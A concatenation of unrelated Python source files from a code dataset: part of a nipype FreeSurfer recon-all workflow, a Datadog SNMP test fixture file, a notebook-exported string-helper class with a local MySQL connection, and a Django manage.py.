wf.connect(masks, "subjects_dir", autorecon_resume, "subjects_dir")
wf.connect(masks, "subject_id", autorecon_resume, "subject_id")
outputnode = pe.Node(
niu.IdentityInterface(fields=['subject_id', 'subjects_dir']),
name='outputspec')
wf.connect(autorecon_resume, "subjects_dir", outputnode, "subjects_dir")
wf.connect(autorecon_resume, "subject_id", outputnode, "subject_id")
return wf
def create_reconall_workflow(name="ReconAll", plugin_args=None):
reconall = pe.Workflow(name=name)
inputspec = pe.Node(
niu.IdentityInterface(fields=[
'subject_id', 'subjects_dir', 'T1_files', 'T2_file', 'FLAIR_file',
'num_threads', 'cw256', 'reg_template', 'reg_template_withskull',
'lh_atlas', 'rh_atlas', 'lh_classifier1', 'rh_classifier1',
'lh_classifier2', 'rh_classifier2', 'lh_classifier3',
'rh_classifier3', 'lookup_table', 'wm_lookup_table',
'src_subject_id', 'src_subject_dir', 'color_table', 'awk_file'
]),
run_without_submitting=True,
name='inputspec')
fs_version_full = Info.version()
if fs_version_full and ('v6.0' in fs_version_full
or 'dev' in fs_version_full):
fsvernum = 6.0
fs_version = 'v6.0'
th3 = True
shrink = 2
distance = 200
stop = 0.0001
exvivo = True
entorhinal = True
rb_date = "2014-08-21"
else:
fsvernum = 5.3
if fs_version_full:
if 'v5.3' in fs_version_full:
fs_version = 'v5.3'
else:
fs_version = fs_version_full.split('-')[-1]
logger.info(("Warning: Workflow may not work properly if "
"FREESURFER_HOME environmental variable is not "
"set or if you are using an older version of "
"FreeSurfer"))
else:
fs_version = 5.3
th3 = False
shrink = None
distance = 50
stop = None
exvivo = False
entorhinal = False
rb_date = "2008-03-26"
logger.info("FreeSurfer Version: {0}".format(fs_version))
def setconfig(reg_template=None,
reg_template_withskull=None,
lh_atlas=None,
rh_atlas=None,
lh_classifier1=None,
rh_classifier1=None,
lh_classifier2=None,
rh_classifier2=None,
lh_classifier3=None,
rh_classifier3=None,
src_subject_id=None,
src_subject_dir=None,
color_table=None,
lookup_table=None,
wm_lookup_table=None,
awk_file=None,
rb_date=None):
def checkarg(arg, default):
if arg:
return arg
else:
return default
defaultconfig = getdefaultconfig(exitonfail=True, rb_date=rb_date)
reg_template = checkarg(reg_template,
defaultconfig['registration_template'])
reg_template_withskull = checkarg(
reg_template_withskull,
defaultconfig['registration_template_withskull'])
lh_atlas = checkarg(lh_atlas, defaultconfig['lh_atlas'])
rh_atlas = checkarg(rh_atlas, defaultconfig['rh_atlas'])
lh_classifier1 = checkarg(lh_classifier1,
defaultconfig['lh_classifier'])
rh_classifier1 = checkarg(rh_classifier1,
defaultconfig['rh_classifier'])
lh_classifier2 = checkarg(lh_classifier2,
defaultconfig['lh_classifier2'])
rh_classifier2 = checkarg(rh_classifier2,
defaultconfig['rh_classifier2'])
lh_classifier3 = checkarg(lh_classifier3,
defaultconfig['lh_classifier3'])
rh_classifier3 = checkarg(rh_classifier3,
defaultconfig['rh_classifier3'])
src_subject_id = checkarg(src_subject_id,
defaultconfig['src_subject_id'])
src_subject_dir = checkarg(src_subject_dir,
defaultconfig['src_subject_dir'])
color_table = checkarg(color_table, defaultconfig['AvgColorTable'])
lookup_table = checkarg(lookup_table, defaultconfig['LookUpTable'])
wm_lookup_table = checkarg(wm_lookup_table,
defaultconfig['WMLookUpTable'])
awk_file = checkarg(awk_file, defaultconfig['awk_file'])
return reg_template, reg_template_withskull, lh_atlas, rh_atlas, \
lh_classifier1, rh_classifier1, lh_classifier2, rh_classifier2, \
lh_classifier3, rh_classifier3, src_subject_id, src_subject_dir, \
color_table, lookup_table, wm_lookup_table, awk_file
params = [
'reg_template', 'reg_template_withskull', 'lh_atlas', 'rh_atlas',
'lh_classifier1', 'rh_classifier1', 'lh_classifier2', 'rh_classifier2',
'lh_classifier3', 'rh_classifier3', 'src_subject_id',
'src_subject_dir', 'color_table', 'lookup_table', 'wm_lookup_table',
'awk_file'
]
config_node = pe.Node(
niu.Function(params + ['rb_date'], params, setconfig), name="config")
config_node.inputs.rb_date = rb_date
for param in params:
reconall.connect(inputspec, param, config_node, param)
ar1_wf, ar1_outputs = create_AutoRecon1(
plugin_args=plugin_args,
stop=stop,
distance=distance,
shrink=shrink,
fsvernum=fsvernum)
reconall.connect([(inputspec, ar1_wf, [
('T1_files', 'inputspec.T1_files'), ('T2_file', 'inputspec.T2_file'),
('FLAIR_file', 'inputspec.FLAIR_file'),
('num_threads', 'inputspec.num_threads'), ('cw256', 'inputspec.cw256')
]), (config_node, ar1_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('awk_file', 'inputspec.awk_file')])])
ar2_wf, ar2_outputs = create_AutoRecon2(
plugin_args=plugin_args,
fsvernum=fsvernum,
stop=stop,
shrink=shrink,
distance=distance)
reconall.connect(
[(inputspec, ar2_wf, [('num_threads', 'inputspec.num_threads')]),
(config_node, ar2_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('reg_template', 'inputspec.reg_template')]),
(ar1_wf, ar2_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig', 'inputspec.orig')])])
if fsvernum < 6:
reconall.connect([(ar1_wf, ar2_wf, [('outputspec.nu',
'inputspec.nu')])])
ar3_wf, ar3_outputs = create_AutoRecon3(
plugin_args=plugin_args,
th3=th3,
exvivo=exvivo,
entorhinal=entorhinal,
fsvernum=fsvernum)
reconall.connect(
[(config_node, ar3_wf,
[('lh_atlas', 'inputspec.lh_atlas'),
('rh_atlas', 'inputspec.rh_atlas'), ('lh_classifier1',
'inputspec.lh_classifier1'),
('rh_classifier1',
'inputspec.rh_classifier1'), ('lh_classifier2',
'inputspec.lh_classifier2'),
('rh_classifier2',
'inputspec.rh_classifier2'), ('lh_classifier3',
'inputspec.lh_classifier3'),
('rh_classifier3',
'inputspec.rh_classifier3'), ('lookup_table',
'inputspec.lookup_table'),
('wm_lookup_table',
'inputspec.wm_lookup_table'), ('src_subject_dir',
'inputspec.src_subject_dir'),
('src_subject_id',
'inputspec.src_subject_id'), ('color_table',
'inputspec.color_table')]),
(ar1_wf, ar3_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig',
'inputspec.orig_mgz'), ('outputspec.rawavg',
'inputspec.rawavg')]),
(ar2_wf, ar3_wf,
[('outputspec.aseg_presurf', 'inputspec.aseg_presurf'),
('outputspec.brain_finalsurfs',
'inputspec.brain_finalsurfs'), ('outputspec.wm', 'inputspec.wm'),
('outputspec.filled', 'inputspec.filled'), ('outputspec.norm',
'inputspec.norm')])])
for hemi in ('lh', 'rh'):
reconall.connect([(ar2_wf, ar3_wf,
[('outputspec.{0}_inflated'.format(hemi),
'inputspec.{0}_inflated'.format(hemi)),
('outputspec.{0}_smoothwm'.format(hemi),
'inputspec.{0}_smoothwm'.format(hemi)),
('outputspec.{0}_white'.format(hemi),
'inputspec.{0}_white'.format(hemi)),
('outputspec.{0}_cortex'.format(hemi),
'inputspec.{0}_cortex_label'.format(hemi)),
('outputspec.{0}_area'.format(hemi),
'inputspec.{0}_area'.format(hemi)),
('outputspec.{0}_curv'.format(hemi),
'inputspec.{0}_curv'.format(hemi)),
('outputspec.{0}_sulc'.format(hemi),
'inputspec.{0}_sulc'.format(hemi)),
('outputspec.{0}_orig_nofix'.format(hemi),
'inputspec.{0}_orig_nofix'.format(hemi)),
('outputspec.{0}_orig'.format(hemi),
'inputspec.{0}_orig'.format(hemi)),
('outputspec.{0}_white_H'.format(hemi),
'inputspec.{0}_white_H'.format(hemi)),
('outputspec.{0}_white_K'.format(hemi),
'inputspec.{0}_white_K'.format(hemi))])])
outputs = ar1_outputs + ar2_outputs + ar3_outputs
outputspec = pe.Node(
niu.IdentityInterface(fields=outputs, mandatory_inputs=True),
name="outputspec")
for outfields, wf in [(ar1_outputs, ar1_wf), (ar2_outputs, ar2_wf),
(ar3_outputs, ar3_wf)]:
for field in outfields:
reconall.connect([(wf, outputspec, [('outputspec.' + field,
field)])])
def getDSTransformPath(subjects_dir, subject_id):
import os
transform = os.path.join(subjects_dir, subject_id, 'mri', 'transforms',
'talairach.xfm')
return transform
dstransform = pe.Node(
niu.Function(['subjects_dir', 'subject_id'], ['transform'],
getDSTransformPath),
name="PreDataSink_GetTransformPath")
reconall.connect([(inputspec, dstransform,
[('subjects_dir', 'subjects_dir'), ('subject_id',
'subject_id')])])
predatasink_orig = pe.Node(AddXFormToHeader(), name="PreDataSink_Orig")
predatasink_orig.inputs.copy_name = True
predatasink_orig.inputs.out_file = 'orig.mgz'
reconall.connect([(outputspec, predatasink_orig, [('orig', 'in_file')]),
(dstransform, predatasink_orig, [('transform',
'transform')])])
predatasink_orig_nu = pe.Node(
AddXFormToHeader(), name="PreDataSink_Orig_Nu")
predatasink_orig_nu.inputs.copy_name = True
predatasink_orig_nu.inputs.out_file = 'orig_nu.mgz'
reconall.connect(
[(outputspec, predatasink_orig_nu, [('orig_nu', 'in_file')]),
(dstransform, predatasink_orig_nu, [('transform', 'transform')])])
predatasink_nu = pe.Node(AddXFormToHeader(), name="PreDataSink_Nu")
predatasink_nu.inputs.copy_name = True
predatasink_nu.inputs.out_file = 'nu.mgz'
reconall.connect([(outputspec, predatasink_nu, [('nu', 'in_file')]),
(dstransform, predatasink_nu, [('transform',
'transform')])])
datasink = pe.Node(DataSink(), name="DataSink")
datasink.inputs.parameterization = False
reconall.connect([(inputspec, datasink,
[('subjects_dir', 'base_directory'), ('subject_id',
'container')])])
reconall.connect([
(predatasink_orig, datasink, [('out_file', 'mri.@orig')]),
(predatasink_orig_nu, datasink, [('out_file', 'mri.@orig_nu')]),
(predatasink_nu, datasink, [('out_file', 'mri.@nu')]),
(outputspec, datasink, [
('origvols', 'mri.orig'),
('t2_raw', 'mri.orig.@t2raw'),
('flair', 'mri.orig.@flair'),
('rawavg', 'mri.@rawavg'),
('talairach_auto', 'mri.transforms.@tal_auto'),
('talairach', 'mri.transforms.@tal'),
('t1', 'mri.@t1'),
('brainmask_auto', 'mri.@brainmask_auto'),
('brainmask', 'mri.@brainmask'),
('braintemplate', 'mri.@braintemplate'),
('tal_lta', 'mri.transforms.@tal_lta'),
('norm', 'mri.@norm'),
('ctrl_pts', 'mri.@ctrl_pts'),
('tal_m3z', 'mri.transforms.@tal_m3z'),
('nu_noneck', 'mri.@nu_noneck'),
('talskull2', 'mri.transforms.@talskull2'),
('aseg_noCC', 'mri.@aseg_noCC'),
('cc_up', 'mri.transforms.@cc_up'),
('aseg_auto', 'mri.@aseg_auto'),
('aseg_presurf', 'mri.@aseg_presuf'),
('brain', 'mri.@brain'),
('brain_finalsurfs', 'mri.@brain_finalsurfs'),
('wm_seg', 'mri.@wm_seg'),
('wm_aseg', 'mri.@wm_aseg'),
('wm', 'mri.@wm'),
('filled', 'mri.@filled'),
('ponscc_log', 'mri.@ponscc_log'),
('lh_orig_nofix', 'surf.@lh_orig_nofix'),
('lh_orig', 'surf.@lh_orig'),
('lh_smoothwm_nofix', 'surf.@lh_smoothwm_nofix'),
('lh_inflated_nofix', 'surf.@lh_inflated_nofix'),
('lh_qsphere_nofix', 'surf.@lh_qsphere_nofix'),
('lh_white', 'surf.@lh_white'),
('lh_curv', 'surf.@lh_curv'),
('lh_area', 'surf.@lh_area'),
('lh_cortex', 'label.@lh_cortex'),
('lh_smoothwm', 'surf.@lh_smoothwm'),
('lh_sulc', 'surf.@lh_sulc'),
('lh_inflated', 'surf.@lh_inflated'),
('lh_white_H', 'surf.@lh_white_H'),
('lh_white_K', 'surf.@lh_white_K'),
('lh_inflated_H', 'surf.@lh_inflated_H'),
('lh_inflated_K', 'surf.@lh_inflated_K'),
('lh_curv_stats', 'stats.@lh_curv_stats'),
('rh_orig_nofix', 'surf.@rh_orig_nofix'),
('rh_orig', 'surf.@rh_orig'),
('rh_smoothwm_nofix', 'surf.@rh_smoothwm_nofix'),
('rh_inflated_nofix', 'surf.@rh_inflated_nofix'),
('rh_qsphere_nofix', 'surf.@rh_qsphere_nofix'),
('rh_white', 'surf.@rh_white'),
('rh_curv', 'surf.@rh_curv'),
('rh_area', 'surf.@rh_area'),
('rh_cortex', 'label.@rh_cortex'),
('rh_smoothwm', 'surf.@rh_smoothwm'),
('rh_sulc', 'surf.@rh_sulc'),
('rh_inflated', 'surf.@rh_inflated'),
('rh_white_H', 'surf.@rh_white_H'),
('rh_white_K', 'surf.@rh_white_K'),
('rh_inflated_H', 'surf.@rh_inflated_H'),
('rh_inflated_K', 'surf.@rh_inflated_K'),
('rh_curv_stats', 'stats.@rh_curv_stats'),
('lh_aparc_annot_ctab', 'label.@aparc_annot_ctab'),
('aseg', 'mri.@aseg'),
('wmparc', 'mri.@wmparc'),
('wmparc_stats', 'stats.@wmparc_stats'),
('aseg_stats', 'stats.@aseg_stats'),
('aparc_a2009s_aseg', 'mri.@aparc_a2009s_aseg'),
('aparc_aseg', 'mri.@aparc_aseg'),
('aseg_presurf_hypos', 'mri.@aseg_presurf_hypos'),
('ribbon', 'mri.@ribbon'),
('rh_ribbon', 'mri.@rh_ribbon'),
('lh_ribbon', 'mri.@lh_ribbon'),
('lh_sphere', 'surf.@lh_sphere'),
('rh_sphere', 'surf.@rh_sphere'),
('lh_sphere_reg', 'surf.@lh_sphere_reg'),
('rh_sphere_reg', 'surf.@rh_sphere_reg'),
('lh_jacobian_white', 'surf.@lh_jacobian_white'),
('rh_jacobian_white', 'surf.@rh_jacobian_white'),
('lh_avg_curv', 'surf.@lh_avg_curv'),
('rh_avg_curv', 'surf.@rh_avg_curv'),
('lh_aparc_annot', 'label.@lh_aparc_annot'),
('rh_aparc_annot', 'label.@rh_aparc_annot'),
('lh_area_pial', 'surf.@lh_area_pial'),
('rh_area_pial', 'surf.@rh_area_pial'),
('lh_curv_pial', 'surf.@lh_curv_pial'),
('rh_curv_pial', 'surf.@rh_curv_pial'),
('lh_pial', 'surf.@lh_pial'),
('rh_pial', 'surf.@rh_pial'),
('lh_thickness_pial', 'surf.@lh_thickness_pial'),
('rh_thickness_pial', 'surf.@rh_thickness_pial'),
('lh_area_mid', 'surf.@lh_area_mid'),
('rh_area_mid', 'surf.@rh_area_mid'),
('lh_volume', 'surf.@lh_volume'),
('rh_volume', 'surf.@rh_volume'),
('lh_aparc_annot_ctab', 'label.@lh_aparc_annot_ctab'),
('rh_aparc_annot_ctab', 'label.@rh_aparc_annot_ctab'),
('lh_aparc_stats', 'stats.@lh_aparc_stats'),
('rh_aparc_stats', 'stats.@rh_aparc_stats'),
('lh_aparc_pial_stats', 'stats.@lh_aparc_pial_stats'),
('rh_aparc_pial_stats', 'stats.@rh_aparc_pial_stats'),
('lh_aparc_a2009s_annot', 'label.@lh_aparc_a2009s_annot'),
('rh_aparc_a2009s_annot', 'label.@rh_aparc_a2009s_annot'),
('lh_aparc_a2009s_annot_ctab',
'label.@lh_aparc_a2009s_annot_ctab'),
('rh_aparc_a2009s_annot_ctab',
'label.@rh_aparc_a2009s_annot_ctab'),
('lh_aparc_a2009s_annot_stats',
'stats.@lh_aparc_a2009s_annot_stats'),
('rh_aparc_a2009s_annot_stats',
'stats.@rh_aparc_a2009s_annot_stats'),
('lh_aparc_DKTatlas40_annot', 'label.@lh_aparc_DKTatlas40_annot'),
('rh_aparc_DKTatlas40_annot', 'label.@rh_aparc_DKTatlas40_annot'),
('lh_aparc_DKTatlas40_annot_ctab',
'label.@lh_aparc_DKTatlas40_annot_ctab'),
('rh_aparc_DKTatlas40_annot_ctab',
'label.@rh_aparc_DKTatlas40_annot_ctab'),
('lh_aparc_DKTatlas40_annot_stats',
'stats.@lh_aparc_DKTatlas40_annot_stats'),
('rh_aparc_DKTatlas40_annot_stats',
'stats.@rh_aparc_DKTatlas40_annot_stats'),
('lh_wg_pct_mgh', 'surf.@lh_wg_pct_mgh'),
('rh_wg_pct_mgh', 'surf.@rh_wg_pct_mgh'),
('lh_wg_pct_stats', 'stats.@lh_wg_pct_stats'),
('rh_wg_pct_stats', 'stats.@rh_wg_pct_stats'),
('lh_pctsurfcon_log', 'log.@lh_pctsurfcon_log'),
('rh_pctsurfcon_log', 'log.@rh_pctsurfcon_log'),
('lh_BAMaps_stats', 'stats.@lh_BAMaps_stats'),
('lh_color', 'label.@lh_color'),
('lh_thresh_BAMaps_stats', 'stats.@lh_thresh_BAMaps_stats'),
('lh_thresh_color', 'label.@lh_thresh_color'),
('rh_BAMaps_stats', 'stats.@rh_BAMaps_stats'),
('rh_color', 'label.@rh_color'),
('rh_thresh_BAMaps_stats', 'stats.@rh_thresh_BAMaps_stats'),
('rh_thresh_color', 'label.@rh_thresh_color'),
('lh_BAMaps_labels', 'label.@lh_BAMaps_labels'),
('lh_thresh_BAMaps_labels', 'label.@lh_thresh_BAMaps_labels'),
('rh_BAMaps_labels', 'label.@rh_BAMaps_labels'),
('rh_thresh_BAMaps_labels', 'label.@rh_thresh_BAMaps_labels'),
('lh_BAMaps_annotation', 'label.@lh_BAMaps_annotation'),
('lh_thresh_BAMaps_annotation',
'label.@lh_thresh_BAMaps_annotation'),
('rh_BAMaps_annotation', 'label.@rh_BAMaps_annotation'),
('rh_thresh_BAMaps_annotation',
'label.@rh_thresh_BAMaps_annotation'),
]),
])
    def completemethod(datasinked_files, subject_id):
        """Log that recon-all finished for *subject_id* and pass the id on.

        ``datasinked_files`` is not read; presumably it exists only so this
        node runs after the datasink (it is wired from the datasink's
        ``out_file`` in the connect() call below) — confirm.
        """
        print("recon-all has finished executing for subject: {0}".format(
            subject_id))
        return subject_id
completion = pe.Node(
niu.Function(['datasinked_files', 'subject_id'], ['subject_id'],
completemethod),
name="Completion")
postds_outputspec = pe.Node(
niu.IdentityInterface(['subject_id']), name="postdatasink_outputspec")
reconall.connect(
[(datasink, completion, [('out_file', 'datasinked_files')]),
(inputspec, completion, [('subject_id', 'subject_id')]),
(completion, postds_outputspec, [('subject_id', 'subject_id')])])
return reconall
| true | true |
f7fa59dd551cd47423e0065e991b4f3d1b3d1bfd | 712 | py | Python | snmp/tests/conftest.py | andersenleo/integrations-core | e521b88e32820a286a70c7797a663d4f9ba41110 | [
"BSD-3-Clause"
] | 2 | 2019-05-28T03:48:29.000Z | 2019-07-05T07:05:58.000Z | snmp/tests/conftest.py | andersenleo/integrations-core | e521b88e32820a286a70c7797a663d4f9ba41110 | [
"BSD-3-Clause"
] | 4 | 2019-07-03T02:53:19.000Z | 2019-07-10T14:52:14.000Z | snmp/tests/conftest.py | andersenleo/integrations-core | e521b88e32820a286a70c7797a663d4f9ba41110 | [
"BSD-3-Clause"
] | 1 | 2020-01-15T16:58:51.000Z | 2020-01-15T16:58:51.000Z | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import os
import pytest
from datadog_checks.dev import docker_run
from datadog_checks.snmp import SnmpCheck
from .common import COMPOSE_DIR, SCALAR_OBJECTS, SCALAR_OBJECTS_WITH_TAGS, TABULAR_OBJECTS, generate_instance_config
@pytest.fixture(scope='session')
def dd_environment():
    """Spin up the docker-compose SNMP stack for the whole session.

    Waits for the "Listening at" log line before yielding, then yields the
    instance configuration generated from all scalar and tabular OIDs.
    """
    compose_file = os.path.join(COMPOSE_DIR, 'docker-compose.yaml')
    with docker_run(compose_file,
                    env_vars={'COMPOSE_DIR': COMPOSE_DIR},
                    log_patterns="Listening at"):
        yield generate_instance_config(
            SCALAR_OBJECTS + SCALAR_OBJECTS_WITH_TAGS + TABULAR_OBJECTS)
@pytest.fixture
def check():
    """Return a fresh SnmpCheck built with empty init/instance configs."""
    snmp_check = SnmpCheck('snmp', {}, {}, {})
    return snmp_check
| 28.48 | 116 | 0.769663 |
import os
import pytest
from datadog_checks.dev import docker_run
from datadog_checks.snmp import SnmpCheck
from .common import COMPOSE_DIR, SCALAR_OBJECTS, SCALAR_OBJECTS_WITH_TAGS, TABULAR_OBJECTS, generate_instance_config
@pytest.fixture(scope='session')
def dd_environment():
    # Session fixture: bring up the docker-compose SNMP stack, wait for the
    # "Listening at" log line, then hand tests the generated instance config.
    env = {'COMPOSE_DIR': COMPOSE_DIR}
    with docker_run(os.path.join(COMPOSE_DIR, 'docker-compose.yaml'), env_vars=env, log_patterns="Listening at"):
        yield generate_instance_config(SCALAR_OBJECTS + SCALAR_OBJECTS_WITH_TAGS + TABULAR_OBJECTS)
@pytest.fixture
def check():
    """Return a fresh SnmpCheck built with empty init/instance configs."""
    return SnmpCheck('snmp', {}, {}, {})
| true | true |
f7fa5a68d486a959e38f57337dcb4a5a4de51095 | 2,188 | py | Python | Z_ALL_FILE/Jy1/fnstr-checkpoint.py | omikabir/omEngin | b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195 | [
"Apache-2.0"
] | null | null | null | Z_ALL_FILE/Jy1/fnstr-checkpoint.py | omikabir/omEngin | b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195 | [
"Apache-2.0"
] | null | null | null | Z_ALL_FILE/Jy1/fnstr-checkpoint.py | omikabir/omEngin | b8c04a5c2c12ffc3d0b67c2ceba9e5741d3f9195 | [
"Apache-2.0"
] | 1 | 2021-04-29T21:46:02.000Z | 2021-04-29T21:46:02.000Z | #!/usr/bin/env python
# coding: utf-8
# In[38]:
import pandas as pd
import os
import numpy
import MySQLdb
# NOTE(review): hard-coded MySQL credentials — should come from config/env.
conn= MySQLdb.connect("localhost","root","admin","omdb")
# Windows-style path join; `file` also shadows the Python 2 builtin name.
file = os.getcwd() + "\\" + "BK1.csv"
class omstring:
    """VB-style string helper API (instr/midcut/etc.) over Python ``str``.

    All methods are thin, stateless wrappers around built-in string
    operations; an instance carries no data.
    """

    def __init__(self):
        # Kept for backward compatibility: the original constructor printed
        # a marker on creation.
        print('x')

    def chk_rcut(self, txt, findchr):
        """Return *txt* from the first occurrence of *findchr* to the end,
        or the string ``'0'`` when *findchr* is absent."""
        x = txt.find(findchr)
        if x != -1:
            return txt[x:]
        return '0'

    def chk_lcut(self, txt, findchr):
        """Return *txt* up to (excluding) the first occurrence of *findchr*,
        or the string ``'0'`` when *findchr* is absent."""
        x = txt.find(findchr)
        if x != -1:
            return txt[:x]
        return '0'

    def midcut(self, txt, fromindx, toindx):
        """Return the substring ``txt[fromindx:toindx]``."""
        return txt[fromindx:toindx]

    def instr(self, txt, chkchr):
        """Index of the first occurrence of *chkchr* in *txt*, or -1."""
        return txt.find(chkchr)

    def instrrev(self, txt, chkchr):
        """Index of the last occurrence of *chkchr*; ValueError if absent."""
        return txt.rindex(chkchr)

    def str_split(self, txt, splitby):
        """Split *txt* on *splitby* and return the list of pieces."""
        return txt.split(splitby)

    def str_chrocc(self, txt, chrchk):
        """Count non-overlapping occurrences of *chrchk* in *txt*."""
        return txt.count(chrchk)

    def str_trim(self, txt):
        """Strip leading and trailing whitespace."""
        return txt.strip()

    def instr_st_end(self, txt, chkstr, st, end):
        """Index of *chkstr* within ``txt[st:end]``, or -1."""
        return txt.find(chkstr, st, end)

    def isall_digit(self, txt):
        """True if every character of *txt* is a digit.

        BUG FIX: the original called ``txt.isdigit(self)``, which raised
        TypeError (``str.isdigit`` takes no arguments).
        """
        return txt.isdigit()

    def isall_alphabet(self, text):
        """True if every character of *text* is alphabetic.

        BUG FIX: the original body referenced an undefined name ``txt``.
        """
        return text.isalpha()

    def isall_number(self, text):
        """True if every character of *text* is numeric.

        BUG FIX: the original body referenced an undefined name ``txt``.
        """
        return text.isnumeric()

    def str_tolower(self, text):
        """Aggressively lower-case *text* (Unicode casefold).

        BUG FIX: the original body referenced an undefined name ``txt``.
        """
        return text.casefold()

    def str_toupper(self, txt):
        """Upper-case *txt*."""
        return txt.upper()

    def str_chktype(self, txt):
        """Return the type object of *txt*."""
        return type(txt)
# Load the site database table and the backup CSV (results are not
# referenced again in this file).
df_mysql = pd.read_sql("select * from sitedb",conn)
df_csv = pd.read_csv(file)
# Sample outage-notification text used to exercise the omstring helpers.
st = """Close Notification:*13 3G & 11 4G Sites in Barisal are gradually up*
Severity: C-3*FT: 14:36 to 14:47_26/04*RT: 18:31_26/04*DUR: 03:55*Link: SPZNR02-SPZNR04*
Cause: VLAN missmatched at SPZNR02 during TNR CRQ000000224351
(Slogan: NCCD Abis_oIP Project FE configure at VLAN Barishal zone)"""
y = omstring()
print(y.instr(st,'VLAN'))
# In[33]:
# Notebook-export scratch calls below: bare expressions whose results are
# discarded when run as a script (they only display inside a notebook).
y.chk_rcut(st,"CRQ0")
# In[22]:
y.midcut(st,3,10)
# In[25]:
y.instr(st,'VLAN')
# In[42]:
y.instrrev(st,'VLAN')
# In[43]:
y.midcut(st,0,21)
# In[44]:
y.midcut(st,y.instr(st,'VLAN'),y.instrrev(st,'VLAN'))
# In[45]:
y.str_chktype(st)
# In[ ]:
| 18.542373 | 96 | 0.601463 |
import pandas as pd
import os
import numpy
import MySQLdb
# NOTE(review): hard-coded MySQL credentials — should come from config/env.
conn= MySQLdb.connect("localhost","root","admin","omdb")
# Windows-style path join; `file` also shadows the Python 2 builtin name.
file = os.getcwd() + "\\" + "BK1.csv"
class omstring:
    """VB-style string helper API (instr/midcut/etc.) over Python ``str``.

    All methods are thin, stateless wrappers around built-in string
    operations; an instance carries no data.
    """

    def __init__(self):
        # Kept for backward compatibility: the original constructor printed
        # a marker on creation.
        print('x')

    def chk_rcut(self, txt, findchr):
        """Return *txt* from the first occurrence of *findchr* to the end,
        or the string ``'0'`` when *findchr* is absent."""
        x = txt.find(findchr)
        if x != -1:
            return txt[x:]
        return '0'

    def chk_lcut(self, txt, findchr):
        """Return *txt* up to (excluding) the first occurrence of *findchr*,
        or the string ``'0'`` when *findchr* is absent."""
        x = txt.find(findchr)
        if x != -1:
            return txt[:x]
        return '0'

    def midcut(self, txt, fromindx, toindx):
        """Return the substring ``txt[fromindx:toindx]``."""
        return txt[fromindx:toindx]

    def instr(self, txt, chkchr):
        """Index of the first occurrence of *chkchr* in *txt*, or -1."""
        return txt.find(chkchr)

    def instrrev(self, txt, chkchr):
        """Index of the last occurrence of *chkchr*; ValueError if absent."""
        return txt.rindex(chkchr)

    def str_split(self, txt, splitby):
        """Split *txt* on *splitby* and return the list of pieces."""
        return txt.split(splitby)

    def str_chrocc(self, txt, chrchk):
        """Count non-overlapping occurrences of *chrchk* in *txt*."""
        return txt.count(chrchk)

    def str_trim(self, txt):
        """Strip leading and trailing whitespace."""
        return txt.strip()

    def instr_st_end(self, txt, chkstr, st, end):
        """Index of *chkstr* within ``txt[st:end]``, or -1."""
        return txt.find(chkstr, st, end)

    def isall_digit(self, txt):
        """True if every character of *txt* is a digit.

        BUG FIX: the original called ``txt.isdigit(self)``, which raised
        TypeError (``str.isdigit`` takes no arguments).
        """
        return txt.isdigit()

    def isall_alphabet(self, text):
        """True if every character of *text* is alphabetic.

        BUG FIX: the original body referenced an undefined name ``txt``.
        """
        return text.isalpha()

    def isall_number(self, text):
        """True if every character of *text* is numeric.

        BUG FIX: the original body referenced an undefined name ``txt``.
        """
        return text.isnumeric()

    def str_tolower(self, text):
        """Aggressively lower-case *text* (Unicode casefold).

        BUG FIX: the original body referenced an undefined name ``txt``.
        """
        return text.casefold()

    def str_toupper(self, txt):
        """Upper-case *txt*."""
        return txt.upper()

    def str_chktype(self, txt):
        """Return the type object of *txt*."""
        return type(txt)
# Load the site database table and the backup CSV (results are not
# referenced again in this file).
df_mysql = pd.read_sql("select * from sitedb",conn)
df_csv = pd.read_csv(file)
# Sample outage-notification text used to exercise the omstring helpers.
st = """Close Notification:*13 3G & 11 4G Sites in Barisal are gradually up*
Severity: C-3*FT: 14:36 to 14:47_26/04*RT: 18:31_26/04*DUR: 03:55*Link: SPZNR02-SPZNR04*
Cause: VLAN missmatched at SPZNR02 during TNR CRQ000000224351
(Slogan: NCCD Abis_oIP Project FE configure at VLAN Barishal zone)"""
y = omstring()
print(y.instr(st,'VLAN'))
# Notebook-export scratch calls: bare expressions, results discarded when
# run as a script.
y.chk_rcut(st,"CRQ0")
y.midcut(st,3,10)
y.instr(st,'VLAN')
y.instrrev(st,'VLAN')
y.midcut(st,0,21)
y.midcut(st,y.instr(st,'VLAN'),y.instrrev(st,'VLAN'))
y.str_chktype(st)
| true | true |
f7fa5a8644796b54aed45902658c76f0c6461e47 | 634 | py | Python | frontend/batterycycling/manage.py | atomisticnet/gibbsml | 43a0e176160b522208320754d07966c8ed9a54a2 | [
"MIT"
] | 5 | 2021-12-02T07:59:23.000Z | 2022-02-12T06:03:56.000Z | frontend/batterycycling/manage.py | atomisticnet/gibbsml | 43a0e176160b522208320754d07966c8ed9a54a2 | [
"MIT"
] | null | null | null | frontend/batterycycling/manage.py | atomisticnet/gibbsml | 43a0e176160b522208320754d07966c8ed9a54a2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django's command-line utility for administrative tasks."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'batterycycling.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Chain the original error so the root cause stays in the traceback.
        hint = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(hint) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| 28.818182 | 78 | 0.68612 |
import os
import sys
def main():
    """Run administrative tasks for the batterycycling Django project."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'batterycycling.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Chain the original ImportError so the root cause stays visible.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
